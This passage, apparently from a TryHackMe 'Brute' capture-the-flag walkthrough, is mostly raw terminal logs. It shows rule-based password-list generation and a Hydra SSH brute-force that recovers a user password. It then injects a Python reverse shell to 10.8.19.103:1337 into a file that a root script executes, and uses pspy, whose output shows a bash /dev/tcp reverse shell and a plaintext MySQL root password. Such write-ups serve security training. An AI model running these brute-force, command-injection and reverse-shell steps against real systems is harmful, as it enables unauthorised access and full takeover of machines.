-rwsr-xr-x 1 root root 39K Feb 7 2022 /snap/core20/1405/usr/bin/umount
-rwsr-xr-- 1 root systemd-resolve 51K Jun 11 2020 /snap/core20/1405/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 463K Dec 2 2021 /snap/core20/1405/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 121K Mar 22 2022 /snap/snapd/15314/usr/lib/snapd/snap-confine
-rwsr-sr-x 1 daemon daemon 55K Nov 12 2018 /usr/bin/at
-rwsr-xr-x 1 root root 84K Jul 14 2021 /usr/bin/chfn
-rwsr-xr-x 1 root root 52K Jul 14 2021 /usr/bin/chsh
-rwsr-xr-x 1 root root 39K Mar 7 2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 87K Jul 14 2021 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 55K Feb 7 2022 /usr/bin/mount
-rwsr-xr-x 1 root root 44K Jul 14 2021 /usr/bin/newgrp
-rwsr-xr-x 1 root root 67K Jul 14 2021 /usr/bin/passwd
-rwsr-xr-x 1 root root 31K Feb 21 2022 /usr/bin/pkexec
-rwsr-xr-x 1 root root 67K Feb 7 2022 /usr/bin/su
-rwsr-xr-x 1 root root 163K Jan 19 2021 /usr/bin/sudo
-rwsr-xr-x 1 root root 39K Feb 7 2022 /usr/bin/umount
-rwsr-xr-- 1 root messagebus 51K Jun 11 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 15K Jul 8 2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 463K Dec 2 2021 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 23K Feb 21 2022 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 140K Feb 23 2022 /usr/lib/snapd/snap-confine
www-data@brute:/home/adrian$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
www-data@brute:/home/adrian$ ls -lah
ls -lah
total 48K
drwxr-xr-x 4 adrian adrian 4.0K Apr 5 2022 .
drwxr-xr-x 3 root root 4.0K Oct 19 2021 ..
lrwxrwxrwx 1 adrian adrian 9 Oct 20 2021 .bash_history -> /dev/null
-rw-r--r-- 1 adrian adrian 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 adrian adrian 3.7K Feb 25 2020 .bashrc
drwx------ 2 adrian adrian 4.0K Oct 19 2021 .cache
-rw-r--r-- 1 adrian adrian 807 Feb 25 2020 .profile
-rw-r--r-- 1 adrian adrian 43 Oct 20 2021 .reminder
-rw-rw-r-- 1 adrian adrian 75 Apr 5 2022 .selected_editor
-rw-r--r-- 1 adrian adrian 0 Oct 19 2021 .sudo_as_admin_successful
-rw------- 1 adrian adrian 0 Apr 6 2022 .viminfo
drwxr-xr-x 3 nobody nogroup 4.0K Oct 20 2021 ftp
-rw-r----- 1 adrian adrian 2.1K Jan 13 17:50 punch_in
-rw-r----- 1 root adrian 94 Apr 5 2022 punch_in.sh
-rw-r----- 1 adrian adrian 21 Apr 5 2022 user.txt
www-data@brute:/home/adrian$ cat .bash_history
cat .bash_history
www-data@brute:/home/adrian$ cat .sudo_as_admin_successful
cat .sudo_as_admin_successful
www-data@brute:/home/adrian$ cat .reminder
cat .reminder
Rules:
best of 64
+ exclamation
ettubrute
---
Et tu, Brute? es una frase latina supuestamente pronunciada por Julio César en el momento de ser asesinado. Se utiliza para expresar una traición inesperada. No hay certeza de que César dijera algo en el momento de su muerte.
---
using hashcat to create a dictionary
┌──(kali㉿kali)-[~/nappy/brutus]
└─$ echo 'ettubrute' > pass.txt
┌──(kali㉿kali)-[~/nappy/brutus]
└─$ echo '$!' > append.txt
┌──(kali㉿kali)-[~/nappy]
└─$ locate best64
/usr/share/hashcat/rules/best64.rule
/usr/share/john/rules/best64.rule
┌──(kali㉿kali)-[~/nappy/brutus]
└─$ hashcat --stdout pass.txt -r /usr/share/hashcat/rules/best64.rule -r append.txt > hashcat_list.txt
┌──(kali㉿kali)-[~/nappy/brutus]
└─$ cat hashcat_list.txt | wc -l
77
┌──(kali㉿kali)-[~/nappy/brutus]
└─$ hydra -l adrian -P hashcat_list.txt 10.10.183.215 ssh -V -t 64
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-13 13:09:42
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 77 login tries (l:1/p:77), ~2 tries per task
[DATA] attacking ssh://10.10.183.215:22/
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute!" - 1 of 77 [child 0] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "eturbutte!" - 2 of 77 [child 1] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ETTUBRUTE!" - 3 of 77 [child 2] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "Ettubrute!" - 4 of 77 [child 3] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute0!" - 5 of 77 [child 4] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute1!" - 6 of 77 [child 5] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute2!" - 7 of 77 [child 6] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute3!" - 8 of 77 [child 7] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute4!" - 9 of 77 [child 8] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute5!" - 10 of 77 [child 9] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute6!" - 11 of 77 [child 10] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute7!" - 12 of 77 [child 11] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute8!" - 13 of 77 [child 12] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute9!" - 14 of 77 [child 13] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute00!" - 15 of 77 [child 14] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute01!" - 16 of 77 [child 15] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute02!" - 17 of 77 [child 16] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute11!" - 18 of 77 [child 17] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute12!" - 19 of 77 [child 18] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute13!" - 20 of 77 [child 19] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute21!" - 21 of 77 [child 20] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute22!" - 22 of 77 [child 21] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute23!" - 23 of 77 [child 22] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute69!" - 24 of 77 [child 23] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute77!" - 25 of 77 [child 24] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute88!" - 26 of 77 [child 25] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute99!" - 27 of 77 [child 26] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute123!" - 28 of 77 [child 27] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrutee!" - 29 of 77 [child 28] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrutes!" - 30 of 77 [child 29] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubruta!" - 31 of 77 [child 30] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrus!" - 32 of 77 [child 31] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrua!" - 33 of 77 [child 32] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubruer!" - 34 of 77 [child 33] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubruie!" - 35 of 77 [child 34] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubro!" - 36 of 77 [child 35] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubry!" - 37 of 77 [child 36] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubr123!" - 38 of 77 [child 37] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrman!" - 39 of 77 [child 38] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrdog!" - 40 of 77 [child 39] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "1ettubrute!" - 41 of 77 [child 40] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "theettubrute!" - 42 of 77 [child 41] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "dttubrute!" - 43 of 77 [child 42] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "matubrute!" - 44 of 77 [child 43] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute!" - 45 of 77 [child 44] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrute!" - 46 of 77 [child 45] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "3ttubrut3!" - 47 of 77 [child 46] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "etubrute!" - 48 of 77 [child 47] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "etbrute!" - 49 of 77 [child 48] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettbrute!" - 50 of 77 [child 49] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "etturute!" - 51 of 77 [child 50] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettb!" - 52 of 77 [child 51] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettub1!" - 53 of 77 [child 52] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrut!" - 54 of 77 [child 53] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubru!" - 55 of 77 [child 54] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubr!" - 56 of 77 [child 55] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubrettubr!" - 57 of 77 [child 56] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "etubr!" - 58 of 77 [child 57] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "bsut!" - 59 of 77 [child 58] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "etubrut!" - 60 of 77 [child 59] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "ettubre!" - 61 of 77 [child 60] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "sttubru!" - 62 of 77 [child 61] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "uteettubr!" - 63 of 77 [child 62] (0/0)
[ATTEMPT] target 10.10.183.215 - login "adrian" - pass "rute!" - 64 of 77 [child 63] (0/0)
[22][ssh] host: 10.10.183.215 login: adrian password: theettubrute!
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 25 final worker threads did not complete until end.
[ERROR] 25 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-13 13:09:50
adrian:theettubrute!
using john to create a dictionary
"--stdout" is a command line option, it can be used to redirect the standard output of a command to a file or another location.
For example, if you ran the command "ls --stdout > filelist.txt", the output of the "ls" command (which would normally be displayed on the terminal) would be redirected to a file called "filelist.txt".
┌──(kali㉿kali)-[~/nappy/brutus]
└─$ john --rules=best64 --wordlist=pass.txt --stdout > john_list.txt
Using default input encoding: UTF-8
Press 'q' or Ctrl-C to abort, almost any other key for status
75p 0:00:00:00 100.00% (2023-01-13 13:14) 170.4p/s erutee
┌──(kali㉿kali)-[~/nappy/brutus]
└─$ cat john_list.txt | wc -l
75
┌──(kali㉿kali)-[~/nappy/brutus]
└─$ cat john_list.txt | grep the
theettubrute
now adding ! to list
You can use the sed command to add a string to the end of each line in a file. The following command will add "!" at the end of each line in the file "john_list.txt":
Copy code
`sed 's/$/!/' john_list.txt > john_list_modified.txt`
This command uses the sed command to search for the end of each line (indicated by the "$" symbol) and replace it with "!" (the string you want to add). The modified lines are then output to a new file called "john_list_modified.txt"
It's worth noting that the original file is not modified, the modified lines are output to a new file, in this case "john_list_modified.txt"
You can also use the -i option to edit the file in place
Copy code
`sed -i 's/$/!/' john_list.txt`
This will edit the file john_list.txt and add "!" at the end of each line
let's do it!
┌──(kali㉿kali)-[~/nappy/brutus]
└─$ sed -i 's/$/!/' john_list.txt
┌──(kali㉿kali)-[~/nappy/brutus]
└─$ cat john_list.txt | grep the
theettubrute!
:)
now login with ssh
┌──(kali㉿kali)-[~/nappy/brutus]
└─$ ssh adrian@10.10.183.215
The authenticity of host '10.10.183.215 (10.10.183.215)' can't be established.
ED25519 key fingerprint is SHA256:IrziL4jB1v+vS+zEJrCmPDK2Y2e5MG9qqxYh5WIfCSM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.183.215' (ED25519) to the list of known hosts.
adrian@10.10.183.215's password:
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-89-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri 13 Jan 2023 06:19:58 PM UTC
System load: 0.0 Processes: 123
Usage of /: 39.9% of 18.57GB Users logged in: 0
Memory usage: 62% IPv4 address for eth0: 10.10.183.215
Swap usage: 0%
18 updates can be applied immediately.
8 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Apr 5 23:46:50 2022 from 10.0.2.26
adrian@brute:~$ cd /home/adrian
adrian@brute:~$ ls
ftp punch_in punch_in.sh user.txt
adrian@brute:~$ cat user.txt
THM{PoI$0n_tH@t_L0g}
adrian@brute:~$ cat punch_in
Punched in at 16:04
Punched in at 16:05
adrian@brute:~$ cat punch_in.sh
#!/bin/bash
/usr/bin/echo 'Punched in at '$(/usr/bin/date +"%H:%M") >> /home/adrian/punch_in
adrian@brute:~/ftp/files$ cat script
#!/bin/sh
while read line;
do
/usr/bin/sh -c "echo $line";
done < /home/adrian/punch_in
adrian@brute:~/ftp/files$ cat .notes
That silly admin
He is such a micro manager, wants me to check in every minute by writing
on my punch card.
He even asked me to write the script for him.
Little does he know, I am planning my revenge.
add this:
`python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.19.103",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'`
┌──(kali㉿kali)-[~/nappy]
└─$ rlwrap nc -lvnp 1337
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.10.183.215.
Ncat: Connection from 10.10.183.215:57770.
root@brute:~# cat /root/root.txt
cat /root/root.txt
THM{C0mm@nD_Inj3cT1on_4_D@_BruT3}
or
┌──(kali㉿kali)-[~/nappy]
└─$ locate pspy
/home/kali/hackthebox/pspy64s
┌──(kali㉿kali)-[~/nappy]
└─$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.183.215 - - [13/Jan/2023 13:47:34] "GET /pspy64s HTTP/1.1" 200 -
adrian@brute:~$ wget http://10.8.19.103:8000/pspy64s
--2023-01-13 18:47:33-- http://10.8.19.103:8000/pspy64s
Connecting to 10.8.19.103:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1156536 (1.1M) [application/octet-stream]
Saving to: ‘pspy64s’
pspy64s 100%[==============================================================>] 1.10M 550KB/s in 2.1s
2023-01-13 18:47:35 (550 KB/s) - ‘pspy64s’ saved [1156536/1156536]
adrian@brute:~$ chmod +x pspy64s
adrian@brute:~$ ./pspy64s
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2023/01/13 18:49:03 CMD: UID=0 PID=95 |
2023/01/13 18:49:03 CMD: UID=0 PID=94 |
2023/01/13 18:49:03 CMD: UID=0 PID=92 |
2023/01/13 18:49:03 CMD: UID=0 PID=91 |
2023/01/13 18:49:03 CMD: UID=0 PID=90 |
2023/01/13 18:49:03 CMD: UID=0 PID=9 |
2023/01/13 18:49:03 CMD: UID=0 PID=89 |
2023/01/13 18:49:03 CMD: UID=0 PID=88 |
2023/01/13 18:49:03 CMD: UID=0 PID=87 |
2023/01/13 18:49:03 CMD: UID=0 PID=86 |
2023/01/13 18:49:03 CMD: UID=0 PID=85 |
2023/01/13 18:49:03 CMD: UID=0 PID=8390 |
2023/01/13 18:49:03 CMD: UID=113 PID=834 | /usr/sbin/mysqld
2023/01/13 18:49:03 CMD: UID=0 PID=83 |
2023/01/13 18:49:03 CMD: UID=0 PID=82 |
2023/01/13 18:49:03 CMD: UID=33 PID=797 | /usr/sbin/apache2 -k start
2023/01/13 18:49:03 CMD: UID=33 PID=796 | /usr/sbin/apache2 -k start
2023/01/13 18:49:03 CMD: UID=33 PID=795 | /usr/sbin/apache2 -k start
2023/01/13 18:49:03 CMD: UID=33 PID=794 | /usr/sbin/apache2 -k start
2023/01/13 18:49:03 CMD: UID=33 PID=790 | /usr/sbin/apache2 -k start
2023/01/13 18:49:03 CMD: UID=0 PID=78 |
2023/01/13 18:49:03 CMD: UID=0 PID=77 |
2023/01/13 18:49:03 CMD: UID=0 PID=766 | /usr/sbin/apache2 -k start
2023/01/13 18:49:03 CMD: UID=0 PID=763 | /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
2023/01/13 18:49:03 CMD: UID=0 PID=76 |
2023/01/13 18:49:03 CMD: UID=0 PID=753 | /usr/bin/ssm-agent-worker
2023/01/13 18:49:03 CMD: UID=0 PID=75 |
2023/01/13 18:49:03 CMD: UID=0 PID=74 |
2023/01/13 18:49:03 CMD: UID=0 PID=734 | /usr/lib/policykit-1/polkitd --no-debug
2023/01/13 18:49:03 CMD: UID=0 PID=73 |
2023/01/13 18:49:03 CMD: UID=0 PID=72 |
2023/01/13 18:49:03 CMD: UID=33 PID=7182 | /bin/bash
2023/01/13 18:49:03 CMD: UID=33 PID=7181 | python3 -c import pty;pty.spawn("/bin/bash")
2023/01/13 18:49:03 CMD: UID=0 PID=71 |
2023/01/13 18:49:03 CMD: UID=33 PID=7072 | bash -i
2023/01/13 18:49:03 CMD: UID=33 PID=7071 | bash -c bash -i >& /dev/tcp/10.8.19.103/4444 0>&1
2023/01/13 18:49:03 CMD: UID=33 PID=7070 | sh -c bash -c 'bash -i >& /dev/tcp/10.8.19.103/4444 0>&1'
2023/01/13 18:49:03 CMD: UID=0 PID=706 | sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
2023/01/13 18:49:03 CMD: UID=0 PID=705 | /sbin/agetty -o -p -- \u --noclear tty1 linux
2023/01/13 18:49:03 CMD: UID=0 PID=702 | /sbin/agetty -o -p -- \u --keep-baud 115200,38400,9600 ttyS0 vt220
2023/01/13 18:49:03 CMD: UID=0 PID=70 |
2023/01/13 18:49:03 CMD: UID=0 PID=674 | /usr/sbin/vsftpd /etc/vsftpd.conf
2023/01/13 18:49:03 CMD: UID=0 PID=660 | /usr/sbin/atd -f
2023/01/13 18:49:03 CMD: UID=0 PID=656 | /usr/lib/udisks2/udisksd
2023/01/13 18:49:03 CMD: UID=0 PID=654 | /lib/systemd/systemd-logind
2023/01/13 18:49:03 CMD: UID=0 PID=649 | /usr/lib/snapd/snapd
2023/01/13 18:49:03 CMD: UID=104 PID=639 | /usr/sbin/rsyslogd -n -iNONE
2023/01/13 18:49:03 CMD: UID=0 PID=630 | /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
2023/01/13 18:49:03 CMD: UID=103 PID=605 | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
2023/01/13 18:49:03 CMD: UID=0 PID=601 | /usr/sbin/cron -f
2023/01/13 18:49:03 CMD: UID=0 PID=6 |
2023/01/13 18:49:03 CMD: UID=0 PID=596 | /usr/bin/amazon-ssm-agent
2023/01/13 18:49:03 CMD: UID=0 PID=595 | /usr/lib/accountsservice/accounts-daemon
2023/01/13 18:49:03 CMD: UID=101 PID=583 | /lib/systemd/systemd-resolved
2023/01/13 18:49:03 CMD: UID=100 PID=579 | /lib/systemd/systemd-networkd
2023/01/13 18:49:03 CMD: UID=102 PID=532 | /lib/systemd/systemd-timesyncd
2023/01/13 18:49:03 CMD: UID=0 PID=515 |
2023/01/13 18:49:03 CMD: UID=0 PID=514 |
2023/01/13 18:49:03 CMD: UID=0 PID=505 |
2023/01/13 18:49:03 CMD: UID=0 PID=503 |
2023/01/13 18:49:03 CMD: UID=0 PID=500 |
2023/01/13 18:49:03 CMD: UID=0 PID=498 |
2023/01/13 18:49:03 CMD: UID=0 PID=496 |
2023/01/13 18:49:03 CMD: UID=0 PID=494 |
2023/01/13 18:49:03 CMD: UID=0 PID=493 |
2023/01/13 18:49:03 CMD: UID=0 PID=484 | /sbin/multipathd -d -s
2023/01/13 18:49:03 CMD: UID=0 PID=483 |
2023/01/13 18:49:03 CMD: UID=0 PID=482 |
2023/01/13 18:49:03 CMD: UID=0 PID=481 |
2023/01/13 18:49:03 CMD: UID=0 PID=480 |
2023/01/13 18:49:03 CMD: UID=0 PID=4 |
2023/01/13 18:49:03 CMD: UID=0 PID=373 | /lib/systemd/systemd-udevd
2023/01/13 18:49:03 CMD: UID=0 PID=344 | /lib/systemd/systemd-journald
2023/01/13 18:49:03 CMD: UID=0 PID=3 |
2023/01/13 18:49:03 CMD: UID=0 PID=273 |
2023/01/13 18:49:03 CMD: UID=0 PID=272 |
2023/01/13 18:49:03 CMD: UID=0 PID=24 |
2023/01/13 18:49:03 CMD: UID=0 PID=23 |
2023/01/13 18:49:03 CMD: UID=0 PID=225 |
2023/01/13 18:49:03 CMD: UID=0 PID=22 |
2023/01/13 18:49:03 CMD: UID=0 PID=21 |
2023/01/13 18:49:03 CMD: UID=0 PID=20 |
2023/01/13 18:49:03 CMD: UID=0 PID=2 |
2023/01/13 18:49:03 CMD: UID=0 PID=199 |
2023/01/13 18:49:03 CMD: UID=0 PID=19 |
2023/01/13 18:49:03 CMD: UID=0 PID=18129 | /lib/systemd/systemd-udevd
2023/01/13 18:49:03 CMD: UID=0 PID=18128 | /lib/systemd/systemd-udevd
2023/01/13 18:49:03 CMD: UID=0 PID=18127 | /lib/systemd/systemd-udevd
2023/01/13 18:49:03 CMD: UID=1000 PID=18120 | ./pspy64s
2023/01/13 18:49:03 CMD: UID=0 PID=18 |
2023/01/13 18:49:03 CMD: UID=0 PID=17559 | bash
2023/01/13 18:49:03 CMD: UID=0 PID=17557 | python3 -c import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.19.103",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")
2023/01/13 18:49:03 CMD: UID=0 PID=17556 | /usr/bin/sh -c echo `python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.19.103",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'`
2023/01/13 18:49:03 CMD: UID=0 PID=17386 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:49:03 CMD: UID=0 PID=17384 | /bin/sh -c /usr/bin/bash /root/check_in.sh
2023/01/13 18:49:03 CMD: UID=0 PID=17381 | /usr/sbin/CRON -f
2023/01/13 18:49:03 CMD: UID=0 PID=17 |
2023/01/13 18:49:03 CMD: UID=0 PID=16842 |
2023/01/13 18:49:03 CMD: UID=0 PID=16442 |
2023/01/13 18:49:03 CMD: UID=0 PID=16 |
2023/01/13 18:49:03 CMD: UID=33 PID=1578 | /usr/sbin/apache2 -k start
2023/01/13 18:49:03 CMD: UID=0 PID=156 |
2023/01/13 18:49:03 CMD: UID=0 PID=15 |
2023/01/13 18:49:03 CMD: UID=0 PID=14 |
2023/01/13 18:49:03 CMD: UID=1000 PID=13188 | -bash
2023/01/13 18:49:03 CMD: UID=1000 PID=13187 | sshd: adrian@pts/1
2023/01/13 18:49:03 CMD: UID=1000 PID=13109 | (sd-pam)
2023/01/13 18:49:03 CMD: UID=0 PID=13103 |
2023/01/13 18:49:03 CMD: UID=1000 PID=13102 | /lib/systemd/systemd --user
2023/01/13 18:49:03 CMD: UID=0 PID=13094 | sshd: adrian [priv]
2023/01/13 18:49:03 CMD: UID=0 PID=13 |
2023/01/13 18:49:03 CMD: UID=0 PID=121 |
2023/01/13 18:49:03 CMD: UID=0 PID=12 |
2023/01/13 18:49:03 CMD: UID=0 PID=11 |
2023/01/13 18:49:03 CMD: UID=0 PID=108 |
2023/01/13 18:49:03 CMD: UID=0 PID=105 |
2023/01/13 18:49:03 CMD: UID=0 PID=104 |
2023/01/13 18:49:03 CMD: UID=0 PID=10 |
2023/01/13 18:49:03 CMD: UID=0 PID=1 | /sbin/init maybe-ubiquity
2023/01/13 18:50:01 CMD: UID=0 PID=18317 | /usr/sbin/CRON -f
2023/01/13 18:50:01 CMD: UID=0 PID=18316 | /usr/sbin/CRON -f
2023/01/13 18:50:01 CMD: UID=0 PID=18315 | /usr/sbin/CRON -f
2023/01/13 18:50:01 CMD: UID=0 PID=18319 | /usr/sbin/CRON -f
2023/01/13 18:50:01 CMD: UID=0 PID=18318 | /usr/sbin/CRON -f
2023/01/13 18:50:01 CMD: UID=1000 PID=18320 | /usr/bin/bash /home/adrian/punch_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18322 | /bin/sh -c /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=1000 PID=18321 |
2023/01/13 18:50:01 CMD: UID=0 PID=18323 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18326 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18325 | /usr/sbin/CRON -f
2023/01/13 18:50:01 CMD: UID=1000 PID=18324 | /usr/bin/bash /home/adrian/punch_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18327 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18328 | /bin/sh -c /usr/bin/mysql -h localhost -u root -p'SuperSqlP@ss3' -e 'flush hosts;'
2023/01/13 18:50:01 CMD: UID=0 PID=18329 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18330 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18331 |
2023/01/13 18:50:01 CMD: UID=0 PID=18334 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18335 | /usr/bin/sh -c echo Punched in at 16:13
2023/01/13 18:50:01 CMD: UID=0 PID=18336 |
2023/01/13 18:50:01 CMD: UID=0 PID=18338 |
2023/01/13 18:50:01 CMD: UID=0 PID=18346 |
2023/01/13 18:50:01 CMD: UID=0 PID=18348 |
2023/01/13 18:50:01 CMD: UID=0 PID=18350 |
2023/01/13 18:50:01 CMD: UID=0 PID=18352 |
2023/01/13 18:50:01 CMD: UID=0 PID=18356 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18358 |
2023/01/13 18:50:01 CMD: UID=0 PID=18360 | /usr/bin/sh -c echo Punched in at 16:38
2023/01/13 18:50:01 CMD: UID=0 PID=18361 |
